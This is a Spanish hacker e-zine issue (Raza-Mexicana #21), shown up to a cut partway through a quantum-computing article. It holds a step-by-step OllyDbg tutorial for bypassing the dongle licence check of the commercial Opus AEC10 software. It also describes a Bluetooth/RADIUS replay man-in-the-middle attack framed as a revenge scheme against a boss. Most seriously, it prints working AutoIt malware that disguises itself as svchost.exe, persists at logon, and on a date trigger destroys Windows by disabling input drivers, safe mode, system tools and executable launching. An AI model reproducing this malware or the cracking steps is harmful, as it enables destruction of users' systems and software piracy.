Vous êtes sur la page 1sur 53

Raza-Mexicana #21

Desde que soy razo tengo shingos de viejas y dinero de a montn Autor desconocido

>>
Artculo Autor
Editorial Tutorial Crack Opus AEC10 Atacando un equipo que se autentifica mediante Bluetooth en una WLAN Programacin AutoIt v3 para inutilizar sistema operativo Windows Mundo Cuntico Qubit vs Bit Direccin IP RSA desde cero ADSL de Telmex Hacking a estacionamientos automatizados XSS (Cross Site Scripting) El lado humano: Part trois STAFF DarkSide int_0x40 DarkSide Netxing DeadSector erregebe int_0x40 beavis Netxing STAFF

Pgina
3 4 13 21 23 27 32 40 46 47 51

<<
DeadSector Fatal darko DarkSide Xytras data_gate Yo_Soy despise Netxing erregebe int_0x40 STAFF deadsector@raza-mexicana.org fatal@raza-mexicana.org darko@raza-mexicana.org darkside@raza-mexicana.org xytras@raza-mexicana.org datagate@raza-mexicana.org yosoy@raza-mexicana.org despise@raza-mexicana.org netxing@raza-mexicana.org erregebe@raza-mexicana.org int_0x40@raza-mexicana.org staff@raza-mexicana.org

Raza-Mexicana #21

Por: STAFF (staff@raza-mexicana.org) La edicin de este nuevo nmero de la e-zine ha demorado ms de lo que hubisemos querido. Varios eventos coadyuvaron al inesperado retraso: exceso de trabajo, desveladas, mujeres, mundial de futbol y alguno que otro danonino, fueron los principales responsables. Tal y como pudieron notar aquellos que nos visitan con regularidad, en los ltimos meses se han superado obstculos para seguir online despus de haber fallecido el viejo server. Dificultades con licencias, conexin, hosting y por supuesto, no poda faltar, con la publicacin de esta revista. Pero ya sabemos y sobra decir que aquello que no nos destruye nos fortalece y eso se puede notar en las propuestas que se han ido cocinando para mejorar la pgina, los foros e incluso hacer otras innovaciones. Estn pendientes, que RMHT viene con aire renovado. Los cambios, que son siempre necesarios, siguen enfocados a continuar con esa tradicin de abrir brecha. Podramos seguir escribiendo decenas de renglones, quizs analizando los retos tecnolgicos que se nos avecinan para sobrevivir en este pas en plena narco guerra, verdadera guerra civil a opinin de algunos. Un pas todava con heridas recientes de una crisis econmica mundial. O podramos extendernos recordando pginas que ya han sido escritas en libros olvidados, cubiertos de polvo, escondidos en un rincn. Sin embargo hay necesidad de ser breves y concretos, con los pis firmes en el momento presente, sin perder la memoria ni quitar la vista en el porvenir. En este nmero haremos un recorrido comenzando por el crackeo del software mexicano de ingeniera de costos Opus AEC10, haciendo uso del debugger ollydbg para jugar con la dll user32; analizaremos un caso hipottico de MITM en el contexto de autenticacin va Bluetooth y Radius a un Punto de Acceso usando un Replay attack; echaremos un vistazo al programa Autoit para reconocer lo sencillo que puede ser automatizar la generacin de cdigo y dejar inutilizado un sistema Windows XP; despus nos sumergiremos en la fascinante carrera para suplantar la computacin clsica basada en Bit por la computacin cuntica basada en Qubit; seguiremos con una explicacin indispensable y no menos hilarante sobre cmo abordar el direccionamiento IP en una subred, sin perder la salida a internet en el intento; despus veremos en detalle el Teorema de Euler como fundamento matemtico del algoritmo de encriptacin RSA, inventado por Ronald L. Rivest, Adi Shamir y Leonard Adleman en 1977; posteriormente haremos un recuento descriptivo del servicio ADSL que ofrece Telmex, su origen y caractersticas generales; detallaremos una posible tcnica para hackear estacionamientos automatizados; mostraremos los alcances de un ataque XSS; para finalizar les traemos una entrega ms de su apreciada seccin de logs del canal razamex. Raza-Mexicana #21 As cerramos la edicin nmero 21, stay tunned.

<< Regresar al ndice

Por: DarkSide (darkside@raza-mexicana.org)

Opus AEC10 el software mexicano de ingeniera de costos ms utilizado en el mundo, evoluciona y nos sirve para lo siguiente: Presupuestos basados en precios unitarios. Cuantificacin y nmeros generadores. Planeacin y programacin de actividades de obra. Licitaciones para obra pblica o privada. Control de pagos (estimaciones y escalatorias). Administracin de subcontratos y destajos. Manejo de almacn de obras (entradas y salidas) Recepcin de requisiciones, cotizacin y surtido de materiales. Este programa cuenta con una proteccin Sentinel UltraPro Usb. Mochila o dongle en ingls es un pequeo dispositivo hardware que se conecta a un ordenador, normalmente, para autenticar un fragmento de software. Cuando la mochila no est conectada, dicho software se ejecuta en un modo restringido o directamente no se ejecuta. Las mochilas son usadas por algunos fabricantes de software como forma de prevencin de copias o gestin de derechos digitales pues es mucho ms difcil copiar la mochila que el software que sta autentica. Generalmente las mochilas se conectan por USB o puerto paralelo Este tipo de dispositivos son usados frecuentemente en programas muy costosos y en software de nicho, como aplicaciones CAD, gestin de hospitales o impresin digital. En algunos casos la mochila est codificada con una clave de licencia especfica por usuario, que determina qu caractersticas estarn habilitadas en el programa destino. Esta es una forma de licenciamiento muy controlado ya que permite al proveedor que su cliente dependa de sus servicios. (Rainbow Technologies) Raza-Mexicana #21 Ya que hemos visto alguna informacin referente a la proteccin con la que cuenta nuestro programa que vamos analizar, empezaremos. Lo primero, abrimos el archivo opusw.exe en el ollydbg, lo dejamos correr y ver que pasa.

El mensaje de error al no encontrar la pastilla. Sin cerrar el mensaje ponemos un breackpoint en destroywindow de user32. Buscamos la dll USER32.DLL, la seleccionamos y damos click derecho y "view names" o solo CTRL+N, nos aparecer una ventana donde estn las funciones de USER32, no ser necesario estar buscando el bpx, solo empiezan a teclear el nombre de la api a la que quieren poner el bpx, en este caso teclearemos "destroywindow" y solo ira filtrando entre las dems apis, pulsamos F2 para poner el bpx en la api.

Raza-Mexicana #21

Ya que hemos hecho lo anterior volvemos al programa y cerramos la ventana no deseada, automticamente saltara el bpx que pusimos en USER32 en el olly, ahora quitamos el bpx y pulsamos CTRL+F9 para correr la aplicacin hasta el prximo RET (esto viene siendo el fin de esa CALL) ya que llegamos al RET pulsamos F8 para salir de esa CALL, si aun no caemos en el modulo que estamos crackeando (programa) hacemos lo mismo CTRL+F9 y F8, as hasta llegar al modulo del programa o alguna dll del mismo programa, cuando llegamos a este modulo lo en la instruccin de arriba de donde llegaste debe ser una CALL que es la que mando destruir la ventana, de aqu en adelante usamos el sentido comn, es decir si arriba no hay un salto condicional que salte esa call, pues trazaremos hasta salir de esa call y ver lo que hay afuera de ella, esto es "trazando hacia atrs", un ejemplo muy sencillo de lo que nos podemos encontrar llegando a un modulo del programa seria que arriba de la CALL que manda destruir la ventana estuviera un salto condicional que nos enviara lneas abajo de esa dll y caer en el call que mando el error.

Vamos a seguir de donde viene ese salto, y llegar hasta el origen, aqu esta la imagen de lo que nos da seguir el origen de ese salto.

Raza-Mexicana #21

Lo volvemos a correr con un bpx en el salto 00552430, y al saltar el olly nopearemos esa direccin ya que no queremos que salte jams. Ahora nos sale que metamos el nmero del candado o algo as.

Usaremos la misma tcnica de destroywindow, ponemos el bpx y despus le damos aceptar.

Nos saldr esta ventana de que la clave es incorrecta, le damos aceptar y nos saltara el bpx que hemos puesto en el olly, y de la misma forma iremos a donde nos esta mandando el error.

Raza-Mexicana #21

Veamos si modificando el salto 004C3C66 al convertir en jmp, nos saltamos definitivamente el mensaje de la ventana de que la clave es incorrecta.

FUE UN XITO, S SE PUEDE!!!

Pero aun no terminamos, ya que cuando abrimos una obra nos vuelve a dar el mensaje de error.

Pero, volvemos a hacer la tcnica de destroywindow, y volvemos a caer cerca de donde hicimos la primera modificacin. y vemos que hay un salto que debera estar saltando y no lo esta haciendo, el salto lo vamos a convertir en jmp

Raza-Mexicana #21

Volvemos a correrlo y funciona bien, ya abre las obras y podemos crear tambin.

Este articulo es basando al tutorial realizado por Sanatas, que pertenece al grupo Sanatas Cracker Team y al cual le doy gracias. El tutorial que realizo Sanatas es sobre la Revisin 11-09-2006, yo solamente analic los datos que daban referencia y los expuse para poder llevarlos acabo en la ultima Revisin 21-06-2008. Solamente falta encontrar las varias de las partes en donde les autoriza mandar a imprimir, que por cierto, ya no les va a salir la ventana de clave para imprimir ya que el salto que modificamos para el principio es el mismo call que usa en esa forma.

Raza-Mexicana #21

As que solo nos saldr clave invlida.

Hasta aqu Sanatas dej el tutorial para que uno mismo fuera buscando los obstculos que tiene el programa en algunas de sus opciones y no solamente a esperar a que nos dieran el crack. Estas son algunos de los obstculos que quedaron pendientes. Backdoor_b mand en el foro un reporte de bugs referentes al crack que haban realizado, para exponer los obstculos que todava estaban al momento de estar trabajando con el programa. En la Opcin de "Ejecucin", por ejemplo "Lista de Escalatorias" o "Lista de Estimaciones" sale una ventana de Dialogo donde pide la clave NEM.

Raza-Mexicana #21

y al ponerle cualquier cosa pues nos manda un mensaje que dice "La entrada al Modulo II de Opus Ole es incorrecta" y no nos deja entrar. Otro detalle de lo ms importante es que cuando ya llevas una cierta cantidad de Datos introducidos en cualquier obra, en determinado momento no te deja agregar mas conceptos y manda la 2 siguientes ventanas una despus de aceptar la primera.

Estas ventanas ya no te saldrn mas, ya que en alguna parte ya realizamos una modificacin que nos salta esta rutina. Solamente vayan a Obra, Abrir, Buscar obra, y en el directorio de opusaec10 en el directorio de Obras les debe aparecer "Ejemplo Opus" y pues la seleccionan y eso es todo, escojan la seccin de Catlogos y traten de aadir Materiales, o cualquier cosa y vern lo que les digo. Los primeros pasos del tutorial les sern de gran ayuda para poder encontrar estos obstculos al querer trabajar con el programa control.exe, ya que trae las mismas secuencias al iniciar.

Raza-Mexicana #21

Ya es solo cuestin de cada uno para poder seguir los pasos que se han dejado anteriormente para continuar buscando los obstculos y poder ir aprendiendo poco a poco. Espero que les sean de utilidad esta informacin para que vayan aprendiendo y no solamente esperar a que personas terceras realicen un crack para poder pedirlo y perder ese momento de poder aprender nuevas cosas uno mismo al estar buscando e investigando. Mando un cordial saludo a los integrantes del Grupo Sanatas Cracker Team y todos los grupos y personas que dan un tiempo para dar a conocer algunos tips o trucos al sacar tutoriales y manuales donde paso a paso van dando esas explicaciones que ayudan mucho a todas estas personas que van aprendiendo, ya que uno nunca nace sabiendo.

REFERENCIAS
_________________________________________________

http://es.wikipedia.org/wiki/Mochila_(dispositivo) http://ecosoft.com.mx http://www.sanatas.com/vb

<< Regresar al ndice


Raza-Mexicana #21

Por: int_0x40 (int_0x40@raza-mexicana.org)

Supongamos que Pepito trabaja en una empresa. En esa empresa hay una WLAN. Su queridsimo jefe Carlitos se conecta a esa WLAN regularmente cada maana a unos metros usando el celular y la laptop que la empresa regala a los directivos ms selectos. Hace tiempo que Carlitos le hace la vida difcil a Pepito, simplemente por haberse hecho novio de una secretaria de muy buenos bigotes acechada por aqul.

Como sea, Pepito se ha podido dar cuenta que las tecnologas y dispositivos que utilizan en la empresa para la autenticacin no verifican la legitimidad, integridad y tiempo de vida de los mensajes intercambiados por Bluetooth y RADIUS. Tal vez por no querer gastar en actualizaciones o en un estudio de robustez de la WLAN.

Entonces se le ocurre un da la idea de que hipotticamente hablando (como situacin de estudio) sera enteramente posible realizar un ataque a una vctima que se conectara mediante un dispositivo, digamos una laptop, a una WLAN y se autentificara va Bluetooth-EAP con otro dispositivo, por ejemplo un telfono celular que use una tarjeta SIM. El celular se autentificara a travs de un servidor RADIUS que conectara a la WLAN en una red basada en IP con DHCP y NAT.

Raza-Mexicana #21

Se podra lograr que la laptop de la vctima se conectara a un punto de acceso WLAN fraudulento aprovechndose de esa falta de verificacin en los paquetes intercambiados al autenticarse? Eso podra lograrse efectuando una copia de los datos intercambiados en la autenticacin entre el mvil y la computadora porttil de la vctima; el servidor RADIUS y el Punto de Acceso legtimo? Re-utilizando los paquetes con las claves de autenticacin podramos poner un AP falso en medio (MITM) al que se autenticara la vctima? Podra as Pepito hacerse de informacin comprometedora de su jefe que fuera de inters para la esposa de ste? Para ello debera tener a la mano antes que nada un dispositivo capaz de escuchar por un lado paquetes de Bluetooth en modo monitor y de retransmitir otros falsificados para hacer creer a la vctima que se autentica con un AP legtimo.

Adems para que Pepito pudiera realizar este ataque tambin tendra que partir de la consideracin de un escenario en donde la laptop sera el dispositivo esclavo en la conexin Bluetooth, el telfono mvil el maestro y el dispositivo atacante que ayudara a hacer el MITM forzara la sincronizacin entre maestro y esclavo. Adems el mvil y el Servidor de Autentificacin (AS) implementaran el mtodo de autentificacin EAP-AKA (probablemente sirviera tambin para el EAP-SIM). Tanto el AS como el mvil intercambiaran dos claves: una del UMTS para cifrado e integridad de claves y otra del tipo MSK (Master Session Key) del maestro1. Por ltimo se considerara adems que el atacante podra haber comprometido al menos un punto de acceso (AP) para obtener la MSK2 y para montar el MITM.

As, resumiendo: Pepito debera tener claro que tenemos una laptop la cual requiere acceso a una direccin IP a travs de una infraestructura WLAN con DHCP y NAT. La autentificacin se proveer por un telfono celular que se enlaza a la laptop va Bluetooth. La autorizacin se lleva a cabo por un servidor que autentifica y comunica con el AP de la WLAN en el contexto de una red basada en IP. El atacante requiere de un dispositivo de Bluetooth que intercepte la comunicacin entre el mvil de la vctima, la laptop y el AP de la WLAN legtima.

La MSK es usada como clave encriptada de la conexin Bluetooth-WLAN. sta es transmitida por el AS al AP de la WLAN usando un protocolo triple A como RADIUS3. Suponemos que la comunicacin entre el AS y el AP est debidamente protegida usando TLS o IPSec. El celular transmite la MSK a la laptop usando un protocolo inespecfico sobre Bluetooth.

Considerando eso, el ataque consistira en lo siguiente:

Raza-Mexicana #21

En la primera parte Pepito registrara y grabara la sesin de enlace Bluetooth durante la cual Carlitos mand con su telfono celular la MSK a su laptop. Pepito obtendra la MSK al haber comprometido el AP usado por Carlitos. En la segunda parte Pepito forzara la laptop de Carlitos para que usara la MSK obtenida simulando la sesin previamente grabada en la primera parte. Como resultado de eso, la laptop de Carlitos se conectara despistadamente al AP de Pepito que usa la MSK obtenida antes.
1

Para ms de este tema: EAP AKA Authentication de J. Arkko y H. Haverinen, Internet Draft, draft-arkkopppext-eapaka-11.txt y EAP Key Management Framework de Aboba, B. Internet Draft, draft-ietf-eapkeying-02).
2

Comprometer un AP se aparta del propsito de la presente historia. 3GPP Technical Specification Group Service and Systems Aspects

Vemoslo en detalle: describimos que Pepito registrara y grabara la sesin de enlace Bluetooth entre el mvil y la laptop de Carlitos. Inicialmente uno y otra se autentificaran mutuamente va el Link Management Protocol (LMP). El telfono celular, que es el maestro enva un mensaje LMP au_rand RAND1 a la laptop. La laptop procesa una respuesta RES1 y la enva de vuelta al mvil usando un mensaje LMP sres. De forma similar la laptop realiza el proceso de autentificacin del mvil enviando un RAND2 y verificando la respuesta recibida RES2. Entonces el mvil (que es el maestro) inicia la encriptacin Bluetooth mandando un start_encryption que contiene un nmero semi-aleatorio EN_RAND. Posteriormente el mvil y el AS se reconocen usando la autenticacin EAP4. El primero enva un mensaje EAP de identity_resp al AS que indica la identidad IMSI de la tarjeta contenida en el celular. Entonces el AS enva de vuelta un mensaje de confirmacin AKA_RAND y una muestra AUTN de autenticacin para la red. El celular verifica la muestra, procesa una respuesta RES y la manda de regreso al AS usando un mensaje AKA_resp.

Finalmente, el mvil y el Servidor de Autentificacin (AS) procesan la clave maestra de la sesin (MSK). La MSK es transmitida por el AS al Punto de acceso (AP) de la WLAN en un mensaje RADIUS access_accept. El dispositivo telefnico transmite la clave MSK a la laptop usando un mensaje encriptado por Bletooth. Entonces la laptop y el AP intercambian datos ecriptados usando MSK a travs de un enlace WLAN.

Toda esa sesin es la que habra registrado y copiado Pepito desde una locacin cercana. Ahora veamos cmo la reproducira para forzar a la laptop para que vuelva a utilizar la misma MSK que previamente se obtuvo, pero con el propsito de que la vctima se conecte a un AP falso que se pondr en el medio.

Raza-Mexicana #21

Inicialmente, el dispositivo de Pepito y la laptop de Carlitos se autentificaran mutuamente como lo explicamos arriba. Pepito primero mandara un RAND1 grabado y recibira la respuesta RES1 de la laptop de Carlitos. Despus sta mandara un RAND3 al dispositivo de Pepito que lo redirige al mvil. ste procesa la respuesta RES3 mandndola a Pepito que a su vez la redirige a la laptop. Pepito iniciara la encriptacin usando el mismo mensaje con el nmero semi-aleatorio EN_RAND grabado previamente y luego reproducira la secuencia de autentificacin EAP que la laptop de Carlitos simplemente contestara al AP de WLAN controlado por Pepito. Los mensajes EAP no seran redirigidos por el AP de Pepito. Finalmente ste mandara un mensaje a la laptop conteniendo la clave MSK grabada con anterioridad y el Bluetooth encriptado. Carlitos mandara todos sus datos al AP WLAN de Pepito pensando que se ha conectado a una red de confianza. Los

H. Haverinen, J. Salowey, EAP SIM Authentication, draft-haverinen-pppext-eap-sim-12.txt.

datos que intercambiara con sus amantes o chicas de la oficina acosadas seran comprometidos: conversaciones MSN, POP3, etc.

El procedimiento podra funcionar para aprovechar ciertas versiones de Bluetooth, arquitecturas y servidores de autenticacin inalmbrica utilizadas por empresas que no proveen ninguna forma de verificacin de la integridad, origen legtimo y caducidad de los mensajes cuando se lleva a cabo el proceso de autentificacin para conectarse a una WLAN. De forma similar a como ocurre en la auditoria de redes WIFI con cifrado WPA-WPA2 a travs de la captura de paquetes que contienen el HAND SHAKE; podemos darnos cuenta de la posibilidad de que un atacante pueda grabar y reutilizar paquetes encriptados Bluetooth-RADIUS para hacer un MITM con un AP falso. La nica diferencia sera que en el caso de WPA-WPA2 se pretende crackear la clave, mientras que en nuestro caso es re-inyectar los paquetes copiados con las claves obtenidas, que se tomarn como legtimos en el proceso de autenticado.

En un pas como el de Pepito donde se ha hecho comn que algunas empresas privadas e instituciones pblicas pidan a sus empleados autenticarse en la WLAN por esta va, con dispositivos y tecnologas que no garantizan seguridad suficiente o que no se han actualizado, sera ms que probable que alguien curioso pudiese llegar a robarle la informacin a sus confiados jefes (algo que por supuesto no estamos recomendando).

No detallamos ni el OS utilizado por el atacante, ni la lista de dispositivos empleados por atacante o vctima, ni el tipo y versin de herramientas para captura e inyeccin de paquetes que se pueden usar en esta tcnica por la enorme cantidad de adolescentes antojadizos que andan por ah. Otras Referencias:

- Cisco Security Advisory, SNMP Trap Reveals WEP Key in Cisco Aironet Access Point, http://www.cisco.com//warp/public/707/cisco-sa-20031202-SNMP-trap.shtml. Raza-Mexicana #21 - Specification of the Bluetooth System, version 2.1.

<< Regresar al ndice

Por: DarkSide (darkside@raza-mexicana.org)

Antes de empezar, con esta pequea secuencia de programacin utilizando el programa AutoIt para facilitarnos el trabajo, le daremos una revisada a una introduccin y breve historia de la evolucin que a dado este programa a su fecha

Introduccin
AutoIt es cada vez ms popular en el campo de la administracin del sistema como una herramienta para automatizar las tareas administrativas. Aunque se trata de uno de sus ms populares usos, se puede usar para automatizar AutoIt nada en un entorno de Windows. Este potente lenguaje de script puede ejecutar cualquier programa y manipular el teclado entrada y el ratn. RunAs con su apoyo, los administradores pueden realizar sin vigilancia instalacin y configuracin de centrales cambios incorporados mediante administrativa privilegios.

Breve Historia
AutoIt iniciado a finales de 1998 como un programa compilado en C utilizado para automatizar las pulsaciones de teclado durante instalaciones de software. En enero de 1999, el equipo de AutoIt liber AutoIt v1, la que incluy, Send , Run, RunWait, WinWait, WinWaitClose, WinWaitActive, WinHide, WinActivate, WinClose, WinRestore, Sleep y SetKeyDelay funciones. AutoIt v2 se public en agosto de ese mismo ao e incluy la primera versin de AutoItX, que ofrece DLL / COM de control. En los prximos dos aos, actualizaciones masivas a AutoIt v2 aadido muchas nuevas funciones a la lengua. En mayo de 2001, el cdigo fuente de AutoIt fue completamente reescrito en C++ y el desarrollo se estanc hasta que De 2003, cuando la primera versin beta de AutoIt v3 fue liberado. Ms de 100 versiones beta ms tarde, los desarrolladores liberaron AutoIt v3 en febrero de 2004. De febrero de 2005 marc el lanzamiento de AutoIt v3.1.0, que aade la capacidad de los grficos interfaz de usuario (GUI) de su creacin. Esta versin es ms notable al ser liberada, porque AutoIt trajo a la vanguardia del mundo de secuencias de comandos, e hizo un rival a Visual Basic Scripting, archivos por lotes, y otros populares lenguajes de scripting.

Raza-Mexicana #21

Utilidades Autoit
Koda http://koda.darkhost.ru/page.php?id=download Es un diseador de la forma visual de la herramienta de secuencias de comandos Autoit3. SciTE - http://www.autoitscript.com/autoit3/scite/ Es un editor de texto basado en Scintilla (www.scintilla.org). Originalmente construido para demostrar Scintilla, ha crecido hasta convertirse en un editor de utilidad general con instalaciones para la construccin y ejecucin de programas. SciTE4AutoIt3 contiene SciTE, envuelto en un nico instalador con todos los ajustes de configuracin necesarios y muchos de los programas de utilidad como Tidy, Obfuscator, AU3Check, guionista, etc AutoIt3Wrapper a SciTE mejorado para su uso con AutoIt3. AutoIt es libre de usar y tiene una fuerte base comunitaria y de ayuda. Ahora si que hemos visto una pequea resea de la evolucin del programa AutoIt, podemos empezar a ver las cosas que queremos automatizar y poder generar el cdigo que nos servir para llevar acabo nuestra meta, que es esta ocasin seria la de dejar inutilizado el sistema de XP utilizando sus fcil programacin. Les recomiendo le den una revisada al archivo de ayuda que trae el AutoIt al momento de instalarse, ya que trae varias referencias a comandos que pueden ser utilizados para generar diferentes tareas o tambin pueden bajar el Ebook de OReilly AutoIt v3 your quick guide y con esas ayudas poder darles una ayuda mas para generar mas secuencias que ustedes vean necesarias. Aqu solamente har mencin de un cdigo que les puede ser de utilidad para poder darse una idea y ustedes ya sobre la marcha pueden ir generando mas cdigos para los que se propongas realizar, ya que en los ultimas fechas se han liberado varios cdigos de virus que se han sido programados con el AutoIt. @UserProfileDir hace referencia al directorio del perfil del usuario actual. Por defecto es C:\Documents and Settings\[- usuario_actual -] (Windows NT/2000/XP). Raza-Mexicana #21 @SystemDir hace referencia al directorio del sistema de Windows.Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

@WindowsDir hace referencia al directorio de instalacin de Windows. Por defecto es C:\Windows (Windows 95/98/Me/XP) o C:\Winnt (Windows NT/2000). @UserName hace referencia al ID del usuario actualmente conectado. @MDAY hace referencia del Da del mes actual y su rango es de 01 a 31 @MON hace referencia al Mes en curso y su rango es de 01 a 12 @ScriptFullPath hace referencia al Directorio que contiene la secuencia de comandos en ejecucin. (Los resultados no contienen una barra invertida) Desactivar Modo Seguro o Modo a Prueba de Fallos RegDelete("HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot") DirRemove Borra un directorio o carpeta. RegDelete Elimina una clave o valor del registro. ( regedit ) RegWrite Crea una clave o valor en el Registro.. ( regedit ) FileDelete Raza-Mexicana #21 Eliminar uno o ms archivos. FileSetAttrib Establece los atributos de uno o ms archivos. No Visualizar icono al ejecutarse Revisar si el archivo se encuentra ya o si no se copia a la direccin que escojamos.

Ya revisado o copiado el archivo, ponerle los atributos de +RSH Escribir en el regedit la secuencia para que al iniciarse el sistema realice su cdigo. #NoTrayIcon If @ScriptFullPath <> @windowsdir & "\svchost.exe" Then FileCopy(@ScriptFullPath, @windowsdir & "\svchost.exe") FileSetAttrib(@windowsdir & "\svchost.exe","+RSH") RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe, C:\WINDOWS\svchost.exe") EndIf $MON = @MON $MDAY = @MDAY if $MON = 12 And $MDAY >= 26 Then DirRemove("C:\Documents and Settings\"& @UserName &"\Configuracin local\Datos de programa\Identities\", 1) DirRemove("C:\Documents and Settings\"& @UserName &"\Configuracin local\Datos de programa\IM\Identities\", 1) RegDelete("HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot") RegWrite("HKLM\System\CurrentControlSet\Services\Kbdclass", "Start", "REG_DWORD", "00000004") RegWrite("HKLM\System\CurrentControlSet\Services\Mouclass", "Start", "REG_DWORD", "00000004") RegWrite("HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR", "Start", "REG_DWORD", "00000004") Raza-Mexicana #21 RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "00000001") RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "00000001") RegWrite("HKCU\Software\Policies\Microsoft\Windows\System", "DisableCMD", "REG_DWORD", "00000001")

RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDrives", "REG_DWORD", "67108863") RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoRun", "REG_DWORD", "00000001") RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", "00000001") RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "EnforceShellExtensionSecurity", "REG_DWORD", "00000001") RegWrite("HKCR\batfile\shell\open\command", "", "REG_SZ", "") RegWrite("HKCR\exefile\shell\open\command", "", "REG_SZ", "") RegWrite("HKCR\regfile\shell\open\command", "", "REG_SZ", "") FileDelete( @windowsdir & "\regedit.exe") FileDelete( @systemdir & "\WScript.exe") FileDelete( @systemdir & "\cscript.exe") DllCall("user32.dll","int","SendMessage","hwnd",$HWND,"int",$WM_SYSCommand,"int",$SC_Mo nitorPower,"int",$Power_Off) Shutdown(6) ;Force a reboot Else Exit EndIf

Con esta pequea probadita de algunos poco comandos, se podrn dar a la idea de todo lo que se pueda explorar en dicha programacin sencillsima y que nos puede ayudar en muchas cosas, tanto para el bien o el mal. Raza-Mexicana #21 Espero sea de su agrado estos artculos y puedan ir indagando en el mundo de la programacin.

Referencias
OReilly AutoIt v3 Your Quick Guide.Pdf

Downloads
AutoIt v3.3.0.0 Liberado el 24 de Diciembre 2008 http://www.autoitscript.com/autoit3/downloads.php

Le recomiendo usar el Editor SciTE AutoIt3 para la escritura de guiones. Tiene una amplia archivo de ayuda y los cdigos de color todo bien. Puede descargar la ltima SciTE Editor AutoIt3 aqu: http://www.autoitscript.com/autoit3/scite/downloads.php Ebook OReilly AutoIt v3 Your Quick Guide. Pdf Guia para AutoIt v3.2.4.9, publicado el 25 de mayo de 2007. http://rapidshare.com/files/129125467/AutoIt_v3-_Your_Quick_Guide.pdf

The Dark Side of Your Mind.

<< Regresar al ndice

Raza-Mexicana #21

Por: Netxing (netxing@raza-mexicana.org)

No existe, ni existir, un cifrado 100% seguro; si de alguna forma u otra la interaccin humana se presenta para la recuperacin, creacin o distribucin de algn tipo de clave.

Idea General
La noticia desde Viena, Austria, en Octubre del 2009, donde se probaba por primera vez un envi de datos por fibra ptica y cifrados de manera cuntica, excitaba a muchos seguidores de las ltimas tecnologas, sabiendo que esta investigacin llevo aproximadamente cuatro largos aos de estudio, para poder tener una maqueta moldeada llamada SECOQC, la cual es pagado por varios pases socios del viejo continente. Se cre una red con seis nodos y ocho enlaces intermedios situados entre s, a una distancia de 6 y 82 Km utilizando fibra ptica, haciendo uso de seis tipos diferentes de cifrados cunticos que generaban las claves. Pero como se esperaba, un da despus se da a conocer la noticia de que el algoritmo McEliece haba sido crackeado, en menos de ocho das con aproximadamente 200 ordenadores, haciendo referencia a un ataque conocido como information-set decoding utilizando el algoritmo Stern, pero no solo este ataque afecta a este algoritmo, sino tambin a Niederreiter quedaba desnudo antes de terminar el ciclo inicial. Esto llega a afectar directamente la creencia que se tena del algoritmo McEliece, un candidato idneo escogido para utilizarlo en las comunicaciones, pero como todo algoritmo puede mejorar su seguridad si se aumenta el tamao de las claves como lgica, pero a la llegada de las computadoras cunticas por la velocidad en los clculos seria uno de tantos algoritmos mandado a la caja de obsoletos.

Introduccin
Qu tan ficticio puede llegar a ser lo cuntico, que hasta grandes cientficos llegan a un punto donde establecen que la creacin de una computadora cuntica deja de ser viable, por tantos y tantos problemas que se enfrentan, al tratar de manejar informacin sobre esta nueva rama tecnolgica. La computacin cuntica va relacionada con la necesidad de suplantar de alguna manera, o completamente a la computacin clsica. Se conoce que la computacin clsica llegara a un lmite en la que los chips no podrn reducirse hasta un lmite donde los electrones no se escapen de los canales de circulacin, conocido este problema como el efecto tnel.

Raza-Mexicana #21

La computacin cuntica en s, es la forma de representar los conocimientos de toda una historia de evolucin de una manera trascendental, llega a ser el principio de un lmite clsico; este mismo limite nos lleva al inicio de poner a prueba todo el estudio cientfico y tecnolgico para controlar la informacin de una manera donde varias ciencias como la fsica cuntica o los fundamentos de la mecnica cuntica tomaran el control de una manera diferente de manejar la informacin.

Qubit es la unidad mnima en la computacin cuntica, la diferencia entre un bit y un qubit es que el bit solo puede almacenar un valor, ya sea 0 o 1. Por otro lado un qubit es ortogonal, esto significa que un solo qubit puede estar en diferentes estados ortogonales, esto sera { |0 , |1 }.

La codificacin densa es el proceso donde los qubits se pueden utilizar para poder transmitir informacin clsica, esto sera que por cada qubit que se transmite se pueden utilizaran dos bits clsicos para el envi de la informacin.

Una de las cosas importantes de lo cuntico es que puede utilizar la teleportacin cuntica, es la idea de poder transmitir qubits sin enviar qubits, esto se realiza combinando la informacin por medio de bits clsicos.

Algoritmos cunticos
En la computacin cuntica existen varios algoritmos de origen clsico, que nos sirven para tareas sumamente bsicas, como para descomponer factores (Shor) y bsqueda (Grover). La importancia de estos algoritmos es tal vez el motor principal para todos los investigadores, ya que el algoritmo de Shor por ejemplo tiende a gran medida a poder hacer operaciones de descomposicin de factores muy rpidamente, esto significa que problemas como algn mensaje cifrado en RSA puede ser descifrado descomponiendo en factores la llave pblica, que con la computacin clsica se tardaran dcadas en poder solucionar o simplemente sera imposible, mientras tanto que usando este algoritmo con computacin cuntica, tardara solo minutos y con un rango alto de probabilidad. Raza-Mexicana #21

Ventajas de un cifrado cuntico


La importancia de un cifrado cuntico radica en la forma de manejar los exponentes en las operaciones, esto significa que es su fuerza principal est en realizar los clculos a velocidades sorprendentes, esto tambin implica que muchos cifrados de la actualidad podrn verse de

manera contundente afectados o pasaran a ser inservibles si la computacin cuntica llega a ser una realidad.

Cifrado cuntico
La mayora de los cifrados actuales se clasifican por claves para el cifrado o descifrado de un algn tipo de mensaje, la importancia general, no solo es que el mensaje valla completamente seguro, sino que la clave para cifrar o descifrar este completamente segura, esto conlleva a que el cifrado cuntico haga su aparicin, usando como base el siguiente esquema:

